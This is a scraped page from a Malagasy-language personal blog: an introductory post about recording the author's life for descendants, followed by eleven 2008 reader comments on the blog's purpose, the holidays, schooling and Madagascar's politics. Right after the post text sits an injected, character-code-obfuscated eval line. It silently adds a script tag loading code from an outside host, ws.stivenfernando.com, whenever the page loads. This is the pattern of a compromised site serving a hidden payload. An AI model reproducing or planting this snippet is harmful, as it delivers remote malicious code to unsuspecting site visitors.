Warning: getimagesize(): Filename cannot be empty in /home/blaogyorg/public_html/wp-content/plugins/wp-open-graph/output.class.php on line 306
Blaogin’ny Namana Serasera weblog

Inona no andrasana?

Miarahaba ny mpitsidika eto.

Tsy vao androany moa ny tena no mody nanoratsoratra teto fa nohon’ny lafiny teknika dia nisinda avy izay voasoratra, tsy olana izany satria ny fiainantsika ety an-tany dia fanavaozana sy fitohizana hatrany.
Miomehy ihany aho manoratra satria efa ela ny lafiny teknika no voavaha fa izao vao mody miverina eto indray, marihiko aloha fa ny ho hitanao eto dia ny fiainako @ maha olon-tsotra ahy, izany hoe ny fiainako an-davan’androko, mety ahitana tsiahy, topi-maso, jery todika, ary fibanjinana ny ho avy. Izany no hataoko indrindra dia mba hahitan’ny fara aman-dimbiko izay mba santionam-piainako tety.
Mety ahitana ihany koa anefa fiaraha-miasa @ namana sasantsasany izay teto @ ity kirakira ity no nahalalako azy ireo, ary dia lasa mifampitondra tahakan’ny olona efa nihaona vatana izahay rehetra ireo, izay moa ilay hoe fianakaviam-be @ alalan’ny kirakira solosaina e!
Ezahiko hatao ihany koa ny hiteny Malagasy, sy ny hanoratra Malagasy satria toa manavanana ahy kokoa io.

Misaotra anareo mitsidika, dia raha misy arina reh an-tavako, dia aza misalasala mampahafantatra izany amiko e!eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


11 comments

Hevitra 11

  1. maintikely maintikely :: Oktobra 22nd, 2008 7:19 pm

    re sipagasy raha izany

    aza miandriandry aza fa dia alefaso ny post marobe hovakianay :))

  2. sipagasy sipagasy :: Oktobra 22nd, 2008 9:45 pm

    mbola ho avy e!!
    misaotra mampahery hihihihi

  3. mpandalo mpandalo :: Novambra 10th, 2008 12:30 pm

    Raha tsy mahadiso , saika mba hanontany aho hoe inona marina moa no tanjona kendrena amin’ny fanoratsoratana toy izao?
    Misaotra tompoko.

  4. sipagasy sipagasy :: Novambra 30th, 2008 6:18 pm

    ny tanjoko aloha dia ny mba handrakitra ny fiainako ho hitan’ny fara sy dimbiko e!

  5. mpandalo mpandalo :: Desambra 2nd, 2008 9:19 pm

    »handrakitra ny fiainako ho hitan’ny fara sy dimbiko e!«

    Raha izany no izy dia tena ilaina ve ny hanaovana an’izany ampahibemaso?
    Diarim-pianakaviana ve no kendrenao sa kosa te-hampita ny traikefanao manokana ho an’ny be sy ny maro ianao?

  6. sipagasy sipagasy :: Desambra 7th, 2008 3:29 pm

    Mpandalo, ao anatiny daholo izany rehetra izany kann, eto ihany koa mantsy no ametrahako izay mba tiako ho zaraina amin’izy ireo any aoriana any, mety ho fijeriko manokana toe-javatra mitranga @ izay vanim-potoana izay, na zavatra tiako raiketina fotsiny e!

  7. mpandalo mpandalo :: Desambra 9th, 2008 1:53 pm

    Sipagasy,
    Mba azonao lazaina ve hoe inona no mba andrasanao amin1izao krismasy sy ny taona vaovaoa ho avy izao?
    Misaotra

  8. sipagasy sipagasy :: Desambra 10th, 2008 3:05 pm

    Ry mpandalo, tanjona inona moa hihihihih amiko tsy misy izay maha samihafa ny andro noely @ andavan’andro. hihihihihihi. andro ho an’ny ankizy io sy ho an’ny mpino ihany koa……..ny taona vao² euuhhh ny isa 8 miova ho 9 veh hhihih tsy misy mahasamihafa azy, fa misaotra ny Avo fotsiny aho mbola omeny ora sy minitra iainako isan’andro….. ary ny anao ry mpandalo mba inona kosa???

  9. mpandalo mpandalo :: Desambra 12th, 2008 11:50 am

    Inona no andrasako ?

    Ireo zavatra natao ka nety tamin’ny 2008 dia hatsaraina , ny tsy nety amboarina na ariana.Fomba fijery ,fomba fanao zavatra…
    Ny vavaka atao amin’Andriamanitra dia ny hanomezany herim-po , herintsaina enti-misedra izao fiovana be misy amin’ny fianana izao.

    Voavakiko tany ho any fa nianatra tao Sainte Chantal i sipagasy .Tsy lavitra teny aho no nipetraka …taona maro lasa izay.Tiako be ilay fahanginana teny.
    Tablier mavo kely no fanaon’ny mpianatra tamin’izany.

  10. sipagasy sipagasy :: Desambra 22nd, 2008 3:47 pm

    mmhh efa tsy tablier mavokely intsony ny teny t@ izahay tonga teny kann, efa lobaka fotsy sy zipo mainty rehefa alatsinainy, mampiaka-tsaina ary andavan’andro kosa dia tablier manga.

    Ka amiko ry mpandalo, ny mba hoe andrasako koa @izoa lazainao fa andro fety izao dia ny mba hisian’ny fandriampahalemana enran-tany annn, ary indrindra any à ilay tany nihaviako!!!! fa asa misy inona loatra fa mirehitra hono izao ao ilay hotel lehibe 5 étoiles handraisana ny fivoriam-be afrikana @ 2010 kouhh!!! asa inona daholo no ambadik’izany???? asa hanao ahoana ny TGV sy ny asa politika rehetra any an-toerana any fa toa tsy manjaka intsony ny fahafaha-miteny???????

  11. mpandalo mpandalo :: Desambra 22nd, 2008 4:20 pm

    Tsy ny any amintsika ihany no mampanahy fa toa mandalo fotoan-tsarotra daholo ny firenena rehetra , ny toekarena no tena mibahana ny filazam-baovao sy ny haino aman-jery.Asa laotra fa dia hitomob be ireo tsy an’asa amin’ny taona ho avy.Jereo tsara ny zava-mitranga any Grece fa mety hiparitaka io raha ela loatra ilay recession.

    Hay ve maharaka tsara ny vaovao avy any an-tanindrazana i sipagasy .Indrisy fa isika malagasy dia bokan’ny trosa ,bokan’ny politika ,bokan’ny fitiavan-tena, bokan’ny tandrametaka ,bokan’ny ankosobolamena….sahobakaka miani-drindrina hoy ny fiteny izay, ny faniriana betsaka fa ny hery no tsy maharaka.

    Marina ny voalazanao fa fotoana hivavahana ho an’ilay tanindrazantsika izao.

Leave a reply